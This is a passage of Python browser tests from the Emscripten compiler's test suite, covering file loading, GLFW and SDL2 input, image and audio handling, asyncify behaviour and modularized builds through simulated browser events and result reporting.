for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION=1'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl2_image.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl2_image.c', '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl2_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.compile_btest([
'sdl2_image_jpeg.c', '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
create_test_file('sdl2_key.c', self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
self.compile_btest(['sdl2_key.c', '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl2_text.c', self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
self.compile_btest(['sdl2_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl2_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
self.compile_btest(['sdl2_gl_read.c', '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.run_process([EMCC, '-c', 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_sound_hardware
def test_sdl2_mixer_wav(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'INITIAL_MEMORY=33554432'])
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(path_from_root('tests', 'sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-g'])
def test_async_2(self):
# Error.stackTraceLimit defaults to 10 in chrome, but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
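# Roughly, the scenario being exercised looks like the following hedged C sketch (this is
# illustrative only, not the contents of browser/async_longjmp.cpp): in Emscripten's
# setjmp/longjmp support, calls made from a function that contains setjmp are routed through
# invoke_* wrappers, and the async sleep happens inside one of those wrapped calls.
#
#   #include <emscripten.h>
#   #include <setjmp.h>
#   static jmp_buf env;
#   static void sleeper() {
#     emscripten_sleep(1);   // asyncify suspension inside an invoke_*-wrapped call
#     longjmp(env, 1);
#   }
#   int main() {
#     if (!setjmp(env)) sleeper();
#     return 0;
#   }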
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
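# As a rough illustration (a hedged sketch, not the contents of tests/browser/async_returnvalue.js),
# a JS library method that suspends via Asyncify typically looks something like:
#
#   mergeInto(LibraryManager.library, {
#     sync_tunnel: function(value) {
#       return Asyncify.handleSleep(function(wakeUp) {
#         setTimeout(function() { wakeUp(value + 1); }, 0);
#       });
#     }
#   });
#
# Because such an import suspends, it must be listed in ASYNCIFY_IMPORTS, either directly or
# via an @response file as in the 'response' variant below.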
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_test_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS=1'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'MODULARIZE=1', '-s', 'MINIMAL_RUNTIME=1'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure', '1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture would load this and cause a timeout
let promise = HelloWorld();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'WASM_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', src)
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
# test illustrating the regression in the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
@no_wasm_backend('cannot customize INITIAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# an amount of memory, different from the default, that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// access INITIAL_MEMORY via a quoted property name so the test also succeeds with closure compiler enabled
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
